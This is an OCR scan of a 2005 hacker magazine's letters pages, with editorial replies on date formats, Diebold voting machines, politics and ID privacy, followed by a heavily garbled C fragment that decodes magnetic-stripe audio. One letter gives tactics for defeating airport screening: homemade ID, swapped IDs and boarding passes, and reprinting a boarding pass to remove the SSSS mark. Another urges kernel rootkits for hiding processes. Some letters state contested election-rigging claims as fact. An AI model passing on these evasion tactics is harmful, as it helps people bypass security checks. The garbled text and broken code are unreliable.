i n 21:4. I'm an Australian too, so Inormally write the\
date dd-mm-yyyy. WhiteHat seemed t o think that this
was another logical suggestion but he's completely
wrong.
On a computer if you write the date as dd-mm-yyyy,
files end up out of order. 01-01-1985 comes before 12-
12-2004 (files from each year would be mixed up with
each other). Whitehat's response is a bit pointless, but
mostly annoying.
BitPirnp
Dear 2600:
Imissed the original article but am responding t o
the Letter by WhiteHat i n t h e current issue of 2600
(21:4).
Whilst you find dd-mm-yyyy logical and familiar, the
main objection t o that format is that for the first 12 days
o f every month it is impossible t o t e l l if the date is i n dd-
mm-yyyy or i n mm-dd-yyyy format with obvious conse-
quences.
With the date written like 2005-03-01 this i s always
yyyy-mm-dd because no one uses yyyy-dd-mm a t all.
There is only one interpretation for that date.
This has already been decided i n International Stan-
dards such as IS0 8601, and earlier IS0 standards back as
far as 1971; and i n Internet RFC documents such as RFC
3339.
Many programs, applications, data formats, and
websites already use the "new" format and there i s a
large amount of information about this topic t o be found
on the Internet.
splke
Dear 2600:
Iam writing i n response t o Jeff's letter i n 21:4 re-
garding hacking a voting machine. Hacking a voting ma-
chine is such a minor issue compared t o corruption. It's
no coincidence that Diebold's new touch screen voting
machines have no paper trail. Diebold also makes ATMs,
checkout scanners, and ticket machines, all of which log
each transaction and can generate a paper trail.
It is also not mathematically possible for uncor-
rupted machines that a l l (not some) of the voting ma-
chine errors detected and reported i n Florida i n 2000
were i n favor of Bush or Republican candidates. However,
that i s what happened.
It's also no coincidence that Walden O'Dell, Chairman
and CEO of Diebold is a major Bush campaign organizer
and donor who wrote i n 2003 that he was "committed t o
helping Ohio deliver i t s electoral votes t o the president
next year."
It's also no coincidence that exit polls i n Ohio during
t h e general election i n 2004 showed Kerry should have
taken Ohio by four points, yet the votes actually recorded
gave Ohio, and thus the country, t o Bush.
It's also no coincidence that votes recorded i n eight
of the other ten battleground states differed from exit
polls by between 2.2 and 9.5 points, and a l l discrepan-
cies (not some) favored Bush (an impossible anomaly).
Note that this is not a partisan issue. I'm a registered
Republican. But that is n o t t h e point. The point is that
t h e public vote doesn't count i n the U.S. since the elec-
tion appears t o be rigged.
The hackers are the ones who wrote t h e software for
the voting machines i n the first place. No need t o pick
the lock on just one voting machine.
' Please withhold any identification for fear of Govern-
ment retribution.
I t ' s hard to believe that it's this cut and dry. For one
thing, it would be monumentally stupid for one party to
have this kind o f control and t o attempt any sort o f
corruption. Yet there are confirmed reports that are hard
to excuse. We can only hope that this is thoroughly
investigated and that the truth will come out.
Dear 2600:
There needs t o be a correction i n Purplesquid's letter
(21:4). The way he gave the information was lackluster
a t best and totally out of context a t worst.
While indeed a voting machine had 4258 votes on it
i n Ohio, it was located and the votes were deleted two
hours beforethe polls even opened according t o the U.S.
and State Election Boards and documented by both t h e
Democratic and Republican National Committees. Squid
gives the impression that these votes were counted and
that is totally false.
According t o all the investigations by the press and
the Federal Election Commission, there was no difference
between the results with t h e paper trails and the states
that didn't have paper trails. Seems t h a t Squid's informa-
tion is yet again i n error.
I n Baker County, Florida, there again was no problem
with t h e vote. I n t h e last eight presidential elecfions,
the voters i n this county have repeatedly gone t o the Re-
publicans and this has been documented so by none
other then the Florida State Election Commission and t h e
U.S. Federal Elections Commission and the results are on
file a t the U.S. Library of Congress (http://www.loc.gov).
Considering that it is a federal felony i n the U.S. t o fal-
sify these forms, Ihighly doubt that any sane person
would want t o spend any time i n prison because o f this
for any reason. This means that every presidential elec-
tion from Carter through Reagan-Bush-Clinton and back
t o Bush has been documented i n this county, and t h e
people who did the investigation were the Florida Demo-
cratic Party with help from the Democratic National Com-
mittee. Yet another myth being passed around as true i n
a country that has tried t o get U.S. forces out of other
European countries by any means possible since t h e end
of WW2, and forget the simple fact that these countries
have asked us t o stay. Could it be that t h e Netherlands
are pissed they do n o t have any U.S. bases there, and as
such do not receive any benefits from same? Like sales
and taxes?
Now while hacking a Diebold machine was widely re-
ported on t h e net as being possible, even ABC-NBC-CBS-
CNN all admitted that they Tumped t h e gun on this story
and had no f a e u a l data t o back this up nor prove it ever
happened." And the people that said they hacked this
machine were unable t o do it i n front of witnesses. Now
isn't that strange that you can hack something only
once? Once you have your way in, unless the whole ma-
chine i s reprogrammed (and this machine was not as it
was placed under lock and key after t h e hacking was
stated), then why couldn't these people hack this with
witnesses watching? Something stinks i n t h e Nether-
lands and methinks it is what PurpleSquid is being told.
Maybe PurpleSquid should stop reading magazines i n
the Netherlands that are equal t o t h e supermarket
tabloids (Enquirer, News o f the World, Star, etc.) here i n
the States, and pay more attention t o information that
can actually be used, like your magazine.
L
Jeez, some people w i l l believe anything.
\
Daniel Gray
Defiance, Ohio
Let us start b y saying that's t h e coolest sounding
name o f any city i n America. As for t h e Diebold issue,
there are simply too many weird things g o i n g o n to be ig-
nored. The lack o f open source software, paper trails, o r
overall accountability i s troublesome a t best. The issues
you cited have n o t been resolved as n e a t l y as y o u seem
to think. And we couldn't find t h a t q u o t e from the media
y o u cited above anywhere. Put simply, this i s n o t about
Republicans and Democrats. I t ' s n o t a b o u t the Nether-
lands. I t ' s about setting u p the most i m p o r t a n t computer
system i n our nation's history and d o i n g it in a way that's
fair and accountable to everyone. This isn't accomplished
through secrecy. As long as such secrecy exists, there
will always be doubts and there will always b e rumors. I f
you want these to go away, then t h e r e has t o be some
level o f accountability. And so, we propose t h e following
t o Diebold: l e t us hack your machines a t t h e next HOPE
conference i n 2006. We will operate t h e system as if we
were an election board. We will try t o cheat. We will try to
create problems o f a l l sorts. And i n t h e end, we will l e t
everyone know what we learned. What possible reason
could there be for n o t accepting such a challenge?
Dear 2600:
I n response t o Forgotten247's a r t i c l e i n 21:4, utiliz-
i n g several tools available on t h e open market (such as
sysinternals.com) and having a detailed knowledge of a
baseline Windows system (which Iassure you, many se-
curity professionals do), your stealth methods are ill
conceived and negligible. If you really wish t o create a
stealth application that cannot (easily) be found, you
need t o create a kernel Level rootkit t h a t can interrupt
system calls (both Windows API and Raw) t h a t request
information for t h e program files a n d process informa-
tion i n question. I f you can p u l l t h a t off, then t h e only
wav t o semi-ieliablv detect vour "hidden" orocess would
b e t o do a f u l l disk analysis From a different 0s. Now it is
still possible theoreticallv t o hide t h e f i l e from even this.
but t h a t would take a l o t o f research a n d i n depth knowl-
edge of file systems, t h e registry, a n d t h e like. Best o f
luck on your stealthing endeavors. B y t h e way, a virus
scanner would detect your "stealthing" methods as soon
as a copy of the exploit made it across t h e desks o f any
relevant researcher. Possibly sooner.
The Stealthed One
(yeah, Right!)
Dear 2600:
Thanks for your words i n t h e "Stick Around" piece i n
21:4. Iwas beginning t o feel a little overwhelmed, as I ' m
sure we all do a t times. What you said was just what I
needed t o hear. It's good t o be reminded t h a t we are, i n
fact, legion. The greed-mongers, fascists, warlords,
megalomaniacs, and those who spread fear for their own
gain will realize thatthey're t h e ones w h o should be wor-
ried. After all, there really are a l o t m o r e o f us than there
are of them. The power is i n a l l our hands. Their only real
power lies i n our own self-doubt. You know t h e quote
about good men doing nothing. Well, I ' m going t o do my
part. Thank you again for your words o f encouragement
and, of course, for your truly rad a n d absolutely neces-
sary publication.
Chaad
 ear 2600:
Ijust finished reading battery's great article on Tick-
etmaster i n 21:4. Ibuy tickets there frequently and Iwas
wondering if anyone out there has had t h e chance t o
look under the hood of t h e virtual waiting room system.
Ihave been trying t o figure out the mechanism that
specifies your place i n "line."
Also, concerning Cabal Agent # l ' s response t o
Zourick about Linux systems i n the federal government
i n 21:4: Am I the only one who is annoyed by the half
page of bureaucratic acronyms that boldly proclaims that
Linux is not certified for federal use? Iapplaud the agen-
cies and the admins that are using Linux without autho-
rization! Especially since common citizens like you and
me are footing the bill for massively over-architected
systems that are designed by these bureaucrats who have
no incentive t o do things cheaply.
Ski l l c r a f t
Cover Letters
Dear 2600:
Love your magazine! It was recommended by the in-
structor a t a Microsoft class Iwas taking. So Ibought a
magazine and later subscribed. I j u s t received 21:4. Iwas
wondering about the pale image o f a face on the front
cover. Idon't really recognize the face, but Ican see it
there on the upper right corner, among the trees. Whose
face i s i t ? Why i s it there?
anonymous
Please allow us to ask the questions.
Dear 2600:
I see George Bush.
All the time?
Dear 2600:
Well, I'm taking the cover of 21:4 literally and I'm
saying something about what Isee. Isee Mr. George
Bush's head i n the corner and Isee the black tombstone
below him. Isee the images of past 2600 magazine cov-
ers on the tombstones beside corporate logos and mas-
cots, and the word "ERASE" on the tomb numbered
especially for all of you. And don't think Ioverlooked the
"SSSS" which will get you searched before getting on an
airplane.
One of the reasons ILove 2600is because of the cre-
ative (and more often than not cryptic) cover which
accompanies every issue. Keep up t h e great work!
Fa ber
Dear 2600:
Following t h e advice on t h e cover of your new issue
("if you see something, say something"), Inoticed the ...
uh ... ghostlike image of Gee Dubbya over the graveyard.
Very nice touch. I'm not completely sure what it's sup-
posed to mean, but it's cool. As for your magazine, keep
doing what you're doing because it kicks ass.
john2kx
Dear 2600:
So Ijust picked up the Latest copy of 2600and as al-
ways I couldn't wait until I was i n the privacy of my office
with the door shut (to avoid any suspicious onlookers) t o
crack open the first page. Somehow Istill felt uptight as
\though someone was watching over my every move as I
turned the pages. So just t o be cautious Iplaced the ma>
discreetly i n my bottom drawer and saved the reading for
later when Iwas sure no one was looking. Ireturned t o
my drawer three hours later t o find that it was none
other than George W. Bush himself who was watching
me!
I would just like t o read one issue i n peace.
jason
Dear 2600:
While sitting i n class reading 21:4, Iread a Letter
about subliminal messages i n the cover art. So Iflipped
the magazine over and under the Lighting Isaw the word
"erase" on the closest tombstone. Enlightened, Imoved
it under the light t o see I f I could find anything else.
Then a l l of a sudden Bush's face appeared and scared the
crap out of me. Inormally don't Like t h e sight of him a t
any time so suddenly seeing him hidden i n the cover sur-
prised me a bit. Once I got home from school Iput it un-
der a black light which makes the words very apparent. I
also scanned 21:2 and Isaw the word "OBEY" and i n 21:3
Isaw "PROTECT" written i n it. Iwill now be scanning
every issue for more surprises.
mr-bloko
Dear 2600:
Thanks for such a great magazine and a beautiful pic-
ture of good ol' GW on the cover. So patriotic, yet so very
scary!
Alex
Dear 2600:
Ido not usually write but had t o say something. I
saw something. Ithought it was a stain left by my drink
on the cover of 21:4. However, it was a different type o f
stain. I n the right corner. Startled me. Thanks for the
great magazine.
miles bogus
Dear 2600:
Honor. Obey. Protect. Erase. Bush?
DigitalDesperado
Dear 2600:
I really dig the UVink used Lately. I've noticed it for a
while and since nobody else has said anything (other
than the fact that sometimes they see it by reflection), I
thought Iwould mention it.
Thanks for continuing t o put out a great mag for all
these years!
Martian
Critiques
Dear 2600:
I have been a long time fan o f your magazine. How-
ever, Ibelieve that politics needs t o be left out. Ilike t o
read and be informed o f technical issues and Iknow peo-
ple from New York loathe Bush because, let's face it, he i s
a Republican. New York is not known for their support o f
Republicans and Iunderstand you are pissed off that he
won and need t o vent. But please do not do it i n this
magazine. Iknow you think it is cute t o put Bush on the
cover and whatever but Icannot go anywhere without
hearing about politics. It is over and Isuggestthe people
get over it. Yes Iagree with rights, Iam an anti-federal-
ist, and Ibelieve i n state rights. Ido n o t believe Bush is
ZbOO Magazine 1
6 warmonger and I do not believe t h a t terrorists should
be sent into a court like we should.
With t h a t said, I agree t h a t U.S. citizens should not
be subjected t o random searches of their houses without
their knowledge and Americans should not be held with-
out trial, lawyer, and so forth. You have my support 100
percent on that. However, i f we capture terrorists or
someone who we suspect is a terrorist (who is not an
American), then I don't care i f they don't have n'ghts, be-
cause they don't! The Geneva Convention does not grant
them this right at all. As far as torturing them, i f i t saves
our troops' lives, go for i t . We did not start this war and
our soldiers should not die because we are t o o afraid t o
let them go without sleep because a bunch of left wing
nut jobs are protesting them t o regain their lost power.
I know most "hackers" are really left wing and are al-
most communist. Granted, I cannot group all of them in
t h e same category since I believe my stance is right wing
even though Bush is t h e first Republican president I have
voted for. Making people aware of their rights is one
thing, telling them they are losing them is OK, but t o
blame i t on one man is a joke. It is both parties' fault
that we have our rights degraded as far as they are now
(Lincoln started this with t h e backing of a strong federal
government). But it's even more t h e fault of t h e Ameri-
can peopte because they have let i t slip this far. I f you
ever watch Jay Leno's jay-walking or Sean Hannity's man
on t h e street quiz, t h e majority of people my age and
younger (23) have no clue who t h e vice president is or
what t h e amendments are. Let alone t h e Bill of Rights! I
know I have turned this into a political rambling and I
am sorry but I beg of you, please, no more. Talk about
rights, talk about how they are being taken away, but be
as partial as you can. I cannot take anymore "Left hates
America, Right are fascists taking our rights away" pro-
paganda.
Rage1605
Nice j o b keeping politics out. Or did you mean for us
t o stop talking about these issues afteryou talked about
them? First off, we discuss a l o t o f things and the space
taken up by this kind o f a topic has always been fairly
minimal. Second, i f it's something that's on people's
minds, then why should we deny them the right t o ex-
press themselves? Like anything else, hackers have inter-
esting perspedives on these issues. Plus, it's generally a
good thing t o express yourself and expose yourself t o
other opinions.
Having been exposed t o your opinions, we cannot re-
act with silence. You believe it's acceptable t o abduct
people from foreign countries and torture them? We
hope you realize that there are many people throughout
the world who have the desire and would have the right
to do the same t o you underyour own logic. I f that's the
worldyou want t o live in, you're well on the way towards
gem'ng there. You say we didn't start this war? We in-
vaded a country that never attacked us and had neither
plans nor ability t o do so. Regardless o f what kind o f so-
ciety we manage t o create over there, you can never es-
cape that fact. You obviously have all kinds o f problems
with whatyou imagine t o be the "left wing." But these is-
sues are o f concern for people o f all political bents.
Hackers come from all kinds o f different political back-
grounds and ideologies so please don't assume that they
all believe the same thing. One thing that most would
, probably agree upon is that expressing something that's
on your mind is a good thing. We're g l a d y o u
opportunityand hope you understand w h y we'll
t o give others t h e chance.
Problems
Dear 2600:
I n case you haven't heard, t h e company ChoicePoint
has been selling personal data (Social Security numbers,
phone numbers, addresses, etc.) t o companies. Someone
created a fake company and ordered i n f o on 145,000
people and so far 50 suspicious credit accounts have
been created i n t h e names of people w h o have had their
identity stolen. This is beyond wrong. T h e criminalin this
case is ChoicePoint! ChoicePoint and every company like
them should be shut down! I f t h e U.S. government
refuses t o do something about these companies I hope
someone else does.
Phreakinphun
Dear 2600:
I just wanna say all t h e usual "I love your magazine"
stuff before I say what I have t o say. I d o love i t and I've
been reading i t for two years now.
This weekend I went t o pick up 21:4 and almost had a
canary i n t h e magazine shop when i t w a s $15 Canadian!
I thought for sure i t was a mistake and asked t h e lady i f
she accidentally put t h e wrong price o n t h e magazine.
She replied t h a t she hadn't and t h a t i t was now $15
everywhere. I couldn't believe i t - I almost died. I liter-
ally sat i n t h a t magazine shop and deliberated o v e r i t for
20 minutes. Was i t worth i t or not? Of course i t is. But i f
I have t o pay more, I would like t o voice some concerns.
First off, I just have t o say t h a t close t o a 50 percent
price hike is a huge price hike and I have a feeling t h a t i t
may deter a lot of readers. How have you handled t h e
price hike with t h e subscribers?
Secondly, I felt completely ripped o f f when I read
about 50 percent of t h e letters (my f a v o r i t e part of your
magazine) were written by teenyboppers who are plan-
ning a DOS attacks on their school networks. I mean who
are these kids and why do you keep publishing these let-
ters? I think we need t o get over t h e w h o l e idea of "what
makes a hacker" letters. I mean either you get i t or you
don't. My suggestion: have a page t h a t defines "hacker"
as you see f i t . but please don't f i l l up t h e letters pages
with them anymore. Please.
I don't mean t o rip on you completely and of course
there is still usefulinfo. I just feel Like I have t o dig a bit
more t o find i t than I used to.
andehlu
Whoever sold you t h a t magazine r i p p e d you o f f Our
price in Canada has n o t increased f o r some time. Our
price is $8.15 i n Canadian dollars ( w h i c h would make
such an increase closer t o 100 percent than t o 5 0 per-
cent). We suspect someone covered t h e "8" and con-
vinced you that i t was 1 5 dollars. It's either incredibly
sleazy or incredibly stupid. Either way, march back there
and demand a refund.
Dear 2600:
I am saddened by t h e current s t a t e of affairs in this
country. To begin with, I recently read a survey i n which
a majority of high school students did n o t know what t h e
First Amendment of t h e Constitution provided. When
read t h e exact text of t h e First Amendment, more than
6 n e third of the students felt it went "too far" i n the
rights it provided. Furthermore, only half of the students
surveyed felt that newspapers should be allowed t o pub-
lish freely without government approval. Three quarters
of students polled said that flag burning was illegal and
about half of them said that the government had the au-
thority t o restrict indecent material on the Internet. This
almost makes me cry! We Live i n a country where the
Leader has publicly stated t h a t he would prefer a dicta-
torship, where blatant election fraud has occurred i n the
form of unverifiable ballots, where t h e common public
thinks that asking questions about government actions
is unpatriotic, and now, t h e future of the country thinks
that we have too many freedoms. I urge everyone who
reads 2600, anyone who believes t h a t information
should be free and that speech is free, t o speak up and
speak out against this tide of complacency. It is our re-
sponsibility t o be critical of our government. I f we do not
act, the fiction of 1984 w i l l become our reality.
Alop
I n a l l fairness, we don't believe Bush was actually
wishing for a dictatorship b u t simply attempting to make
one o f those points o f his that never really took off. But
your warnings are definitely right on target. Being aware
and awake are essential for the future.
Dear 2600:
Iattended a 2600 meeting for the first time at the
Barnes and Noble i n the Baltimore Harbor. Iam disap-
pointed t o find out what goes on. When Ishowed up I
was told that nothing really goes on buttalking between
others who show up. This i n no way constitutes a meet-
ing. Instead, it's a live chat room you feel awkward join-
ing. I was under the assumption that everyone was able
t o attend a 2600 meeting but I never plan t o read an-
other 2600 article or attend another 2600 meeting
again. After getting the cold shoulder from all a t the
meeting and no response from the webmaster of the
Maryland 2600 meeting site (who is not keeping it up-
dated), Iam now writing t o you t o please step i n and do
something about this chapter of lame so-called hackers
i n Maryland.
"Yan
Since you're never going to read us again, there's re-
ally no way we can address your concerns to you. But it
should be understood that these are n o t meetings with
lectures and agendas b u t gatherings where everyone is
free to converse with whomever they choose i n a public
area. We're sorry ifyou're n o t comfortable being a part o f
this b u t that's how it is. We encourage all who attend
to be open to newcomers and n o t form cliques. And new-
comers should avoidjumping to conclusions.
Dear 2600:
Ihave been purchasing your magazine (when Ican
find i t ) for the last four or five years and want t o let you
know that Ifound it, but not without some digging. It
seems that Barnes and Noble carries your fine publica-
tion but chooses t o keep it hidden away i n a drawer. Af-
ter searching for a minute ( I don't have a l o t of
patience), Iasked the cashier where it was. She showed
me and didn't give me a reason as t o why it is hidden
awav.
Chris
This is n o t Barnes and Noble policy b u t rather that
,o f the local store or even o f that particular person.
Complaints to the store manager usually are enough to\
resolve the situation. I f this doesn't work, l e t us know
the specifics.
Dear 2600:
Iwas on vacation recently i n Michigan t o see some
friends. While there, Istayed a t both a Baymont I n n and
a Days Inn. While a t the Baymont Inn, Ihad good unre-
stricted wireless access. No one tried t o censor all the
porn or hacking sites Ivisited and downloaded from. Not
a problem. Ihighly recommend them. About halfway
through my trip, Imoved over t o a nearby Days I n n due
t o price range considerations. While a t the Days I n n I
had relatively good cable access and Iwas satisfied. To-
wards the end of my stay, Iwas abruptly cut off i n the
middle o f a download from astalavista.com. Ithought
the site was down and Icontinued surfing, noting as
time went on that Icontinually received time out mes-
sages from them. Eventually when I got t h e same mes-
sage from 2600.com and a number of other sites, I
realized it had been blocked by whatever server they
were using t o manage connections at the hotel. This was
annoying but Iwas willing t o Let bygones be bygones. I
connected t o a proxy and was happily downloading for
about two hours before the admin cut o f f access t o my
proxy. Well, needless t o say, this pissed me o f f t o no end.
Iswitched off t h e proxy and wrote their corporate head-
quarters a nasty note stating that Iwould never patron-
ize any establishment of theirs again and that Iwould
highly recommend all my friends find other accommoda-
tions unLess drastic action was taken and Iwas given an
apology. To date I've received neither a reply nor an ac-
knowledgment. So this is me recommending to all the
happy hackers out there not t o ever visit Days Inn.
Jon
The one thing you didn't tell us was what excuse they
gave for cutting you off. Did they specifically state that
they were monitoring what you were downloading? This
doesn't make a great deal o f sense.
Ideas
Dear 2600:
Iwish Ihad been introduced t o this magazine sooner
than a year ago. I was actually pretty surprised when I
found out that a store i n t h e East Boonies of Maine car-
ried it and, ever since, I've been obliged t o pick it up.
Naturally, when I had an interesting thought about
America's newest catch phrase, 2600 was the first place I
thought of sending it. So here it is:
Freedom isn't free. Iknow this motto has been circu-
lating around the country for a t Least a few years now, i n
hopes that people w i l l realize a sacrifice has t o be made
t o preserve freedom. But i s this a l l the slogan really
means? Freedom isn't free could mean something com-
pletely unintended. If we stop thinking i n terms of cost,
t h e saying becomes more of a slogan for the trends i n
the U.S. as Iunderstand them. Freedom isn't free, man,
it's i n prison. Or a t least headed that way. Do you seethe
subtle transition there? With a different connotation, a
very popular saying for the defense o f the government's
actions overseas becomes a slogan fit for the posters of
Big Brother's Oceania. Freedom isn't free, not com-
pletely, not yet. I'm just glad t h a t there are people out
there, you and others, who are working i n its defense.
' Thank you for trying t o educate the masses. Little
more than a year ago, Iwas one of them.
Tommy
You most definitely have a future i n mass marketing.
Fighting Back
Dear 2600:
I'm typing this a t 36,000 feet after reading the re-
cent article on identification and airline security. As a
frequent business traveler, old hacker, and semi-anar-
chist, I've had plenty of time t o experiment with airline
security and identity documents i n both air travel and
general use.
First off, Ialmost never use any sort of I D document
and on the rare occasion that Ido, it's nearly always a
"fake" one. Isay "fake" because Imake it a point of using
ID that Ihave created myself, but that contains realinfo.
Why? To prove the point that fake documents will fly (no
pun intended), but without exposure t o persecution for
having false documents. There is nothing illegal i n this.
Actually, possession or use of false documents itself is
generally not illegal, but using them for fraudulent pur-
poses is.
Iencourage everyone t o refuse t o use ID for every-
day things. Simply refuse it, or say you don't have it, or
whatever. I n many, many years of doing this, it has never
stopped me from doing what Iwant. When asked i f Ihave
ID for a credit card purchase, for example, Isimply say
"no." Sometimes Iget a deer-in-headlights look, some-
times a question or two, but never has someone refused
my purchase!
Remember that you can't be forced t o give ID t o the
police i f you're not driving a vehicle. A recent Supreme
Court case has been touted as changing that, but it does
not. The recent decision merely says that you must iden-
tify yourself during an investigation, but does not say
you must show identification documents. Ihave used
this a number of times during civil disobedience activi-
ties with 100 percent success (meaning I've never been
arrested for it). Ihave had cops literally spith'ng on me
through anger a t my refusal t o provide anything more
than my name, but they knew better than t o arrest me
for such a non-crime. You must also refuse t o give your
birth date and Social Security number, as either of those
items will serve t o fully identify you with a computer
search, and void the purpose of refusing t o show ID doc-
uments.
When flying, Itry t o have fun with the security
goons. On many flights Iuse an expired ID. Most of the
time they don't notice this, but often they will and "se-
lect" me for specialinspection. As most of you know, this
means putting four "S" symbols on my boarding pass and
then doing +hand search of my laptop case and body.
The ludicrousness of this should be obvious; the terror-
ists we are supposedly trying t o stop all had proper, cur-
rent, and valid U.S. I D documents! And why does expired
ID matter? Does it stop being me on the day that it ex-
pires? There can be no valid security reason t o require a
current ID versus an expired one.
The hand search implies another thing t o me; they
obviously must know that the X-ray and metal detector
screenings are insufficient t o assure security. Imean, if
they are effective, then why the special screening? That
,or the motive for the special screening is t o punish
people for not having "proper" I D or n o t conforming t o
\
visual or behavioral expectations. And explain t o me why
a terrorist would do something that everyone knows will
get you a special screening, such as buying a one-way
ticket, flying standby, or buying a t t h e last minute? I
mean, do we really think that someone who intends t o
blow himself up would be concerned w i t h t h e added cost
of a round trip ticket? Or that they'd p l a n it a t the last
minute and not buy a ticket i n advance?
Often Iwill use one of my handmade I D documents,
and never have had one questioned. Some are purposely
not-so-good creations, but they never get questioned.
I'm thinking a six year old's crayon rendition o f a driver's
license would be good enough for these minimum wage
workers. Most of the time they don't look closely enough
t o detect something obvious. When traveling with oth-
ers, Iusually talk them into switching I D and boarding
passes with me. The security people have never noticed
this. For the most part they just want t o match the name
on the boarding pass with the ID. I f t h e y did notice, we'd
simply explain that we got them mixed u p when picking
them up from the ticket counter.
Now let's talk about the matter o f t h e Scarlet Letter
on the boarding pass t o signify people who are selected
for "random" special inspections. One thing should be
real obvious here; it's just a piece of paper. A boarding
pass, which Iprinted on my own computer. To be more
clear, one copy of the boarding pass. A l l you need is a
second copy without the symbols, and t h e security peo-
ple won't know how "special" you are. Of course, it's
probably illegal t o do this, so I'm n o t admitfing t o ever
having tried it nor encouraging you to. But if you were
to, say, print two copies just for safety, and then forget
and pull out the "wrong" one, Ithink it would be pretty
tough t o prosecute you.
Identity documents i n general a r e pretty useless
right now since they are easily faked, b u t unless we fight
back, there will come a time when they are demanded for
anything you do. Eventually there w i l l be systems i n
place for nearly anyone t o check your document against
a database, and of course, they will l o g t h a t "for system
security." Meaning, a trail of your movements and activi-
ties w i l l be generated. Already i n my home state the bars
can subscribe t o a service which will read and verify the
data on the magnetic strip on a driver's license. How
long before you have t o authenticate yourself t o use the
library, public wifi, buses/trains/airplanes, or anything
else?
Refuse t o use ID as often as possible, while you still
can. "Principio obstate." (Resist from t h e beginning.)
saynotoid@gmail.com
Thanks for the words o f wisdom. It's always a goo0
idea to challenge whatever system i s being crammeci
down our throats b u t i n such a way as t o n o t putyourselr
a t risk unnecessarily. We j u s t wonder how long such
things will still be possible.
to letters@26OO.com or use snail mail:
2600 Letters, PO Box 99, Middle Island,
NY 11953 USA.
Page 45'
i n e -^
f int i;
short int max = 0;

I 1' pauses until the dsp level is above the silence threshold

yiE:lence-pau.e(int
file descriptor to read from
[silence-thresl silence threshold ' 1
fd, int s i l e n r ~ t h n s )

1
short int buf = 0;

while (buf < silence-three) ( 1' loop while silent +I

xreadlfd, Lbuf, sizeof (short int)); 1. read from fd ' 1
'
I* absolute value *I

1' get8 a sample, terminating when the input goes below the eilence threshold
[fdl file descriptor to read from
[sample-rate] sample rate of device
[sllence_thres]silence threshold
'* global f *
[sampleI sample
[sample_sire] n d e r of frames in sample * I
void get-dsp(int fd, ~ n tsample-rate, int silence-thres)

int count = 0, eos = 0, i;

short buf;

sample-size = 0;

silence-pause(fd, ailence_thresl; I * wait for sample * I

/ * fill buffer *I
.
while (leos) (

sample = xrealloc(sample, sizeof (short int) * (BuF-SIZE (count + 1)));

for (i = 0; i < BUF-SIZE; it+) (
xread(fd, Lbuf, sizeof (short int));
sample[l + (count BUF-SIZE)] = buf;

COUnttt;
sample-sire = count BUF_SIZE:

eos = 1; 1. check for silence .I

if (sample-sire > (sample-rate END-LENGTH) 1 1000) {
for (I = 0: i < (sample-rate ' END-LENGTH) / 1000; i++) {
b ~ f= 8amplellCOUnt * BUF-SIZE) -
I];
if (b"f < 0)
b"f = -buf;
if (buf > silence-thres)
eoa = 0:
I
1 else
eos = 0;

1' Open the file

[fdl file to open
[verbose] verbosity flag
global r *
+"

[sample_size]number of frames in the file * I

SNDFILE *sndhle_init(int fd, int verbose)
1
SNDFILE .snd6le;
SF-INFO sfinfo:

memset(Lafinfo, 0, sizwf(sfinfo)l; I* clear sfinfa structure *I

sndhle = sf_open_fd(fd. SFM-READ, Safinfo, 0); I* set endfile from Ed * I

if (sndhle == Null) (
fprintf(stderr, "**+ Error: sf-open_fd() failed\n");
enit(EXIT_FAILURE);
1
if [verbose) { I' print some statistics * I
fprintf(stderr,t.." Input file format:\""
' Frames: %i\n"
" sample Rate: %i\n"
' Channels: %i\""
' Format: Ox%OBx\n"
" Sections: %i\n"
" Seekable: %i\n',
(int)sfinfo.frames, sfinfo.samplerate, 8finfo.channels.
sfinfo.fonnat, sfinfo.sections, sfinfo.seekable);
I

".*.
if (sfinfo.channels I= 1) { I* ensure that the file is mono +

I
fprintf(stderr, Error: Only monaural files are supported\n");
exit(ExIT_FAILuRE);
I
s m p l ~ s i z e= s M f o . f r m s ; / * set sample eize fl
retnrn andrile;

\Spring zoo5 P a g e 47
 [sndfilel SNDFILE pointer from sf-open() or sf-open-fd()
* * global **
[samplel sample
[sample_aizel number of frames in sample * /

sf-count_t count;

sample = xmalloc(sizeof(sh0rt int) * sample_size); I' allocate memory *I

covnt = sf-read-short(and5le. sample, sample-size); / r read in sample * I

if (count I = sample-size) {
fprintf(etderr, ''*- Warning: expected 6i frames, reed %i.\n",
sample_8ire, (rnt)count);
sample-size = count;
)

I * decodes aiken biphase and prints binary

[frepthres] freqvency threshold
* * global *'
[sample] sample
[sample_sizel n d e r of frames in sample * I
void decode_aiken_biphase(int frecthres, ~ n tsilence-thres)
(
z n t i = 0, peak = 0, ppeak = 0;
~ n t *peaks = NULL, peaks-size = 0;
int zerobl;

for (i = 0; i c sample_size; i++) I * absolute value * I

if (sample[il < 0)
sample[il = -sample[i];

i = 0; I* store peak differences ' 1

while (i c sample-sire) {
ppeak = peak; I* old peak value '/
while (sample[il i= silence-thres 6 s i c sample-size) / * find peaks ' 1
it+;

I
peak = 0;

I
while (sample[il > silence-thres 6 6 i < sample_size) (
if (samplel~l> sample(peak1)
peak = i;

peaks -
(peak-ppeako) (
xrealloc(peaks, aizeof(int)
peaks[peaks_size] = peak - ppeak;
+ (peaks-sire + 111;

peaks-$l=e++;

I* decode aiken biphase allowing for

frequency deviation based on frecthres * I
/.~gnorefirst two peaks and last peak '/
.. .
zerobl = oeaksl21:
for (i = 2; L < peaks-size -
1; i++) {
if Ipeaks[iI < (lzerobl / 2) + (frepthres (zerobl 1 2) 1 100)) h b
peaks[il > ((zerobl / 2) -
(freq-thres * (zerobl / 2) 1 100))) (
if (peaksli + 11 < ((zerobl I 2) + (frecthres (zerobl / 2) / 100)) 6s
peaksli + 11 r ((rerobl I 2 1 -
(freq-thres * (zerobl I 2) 1 100))) (
printf("1");
zerobl = peaks[i] * 2;

I
else if (peaks[il c (zerobl + (frepthres zerobl / 100)) 66 +

-
peaks[il > (zerobl (fre~thres* zerobl / 100))) (
printf(*O");
Xifndef DISABLE-VC
zerobl = peaks[il;
#endif
)

I * main +I
int main(int srgc, char *argv[])
int fd;
SNDFILE "endfile = NULL;

/ + codquration variables e l
char *filename = NULL;
int auto-thles = ?.UTO-T11El, Y-level = 0, ~ 6 ~ s n d 5 l= e0. Verbase
~ n tsample-rate = SAMPLE-RAW, silence-thres = SILENCE-TARES;
- 1;

I* getopt variables f /
int ch, option-index;
static struct option long-options[] = (
("auto-thres', 0, 0. ' a ' ) ,
("device", 1, 0 , ' d m } ,
{"file", 1, 0, '£'I,
("helo". 0. 0. ' h ' ) .

("silent", 0, 0, ' s ' } ,

("threshold', I , 0, 't'},
("version", 0. 0. ' v ' l ,

/. process command line arguments +I

while (1) (
/ if (eh == -1)
break;

switch (Ch) (
case ' a ' : I * auto-thres * I
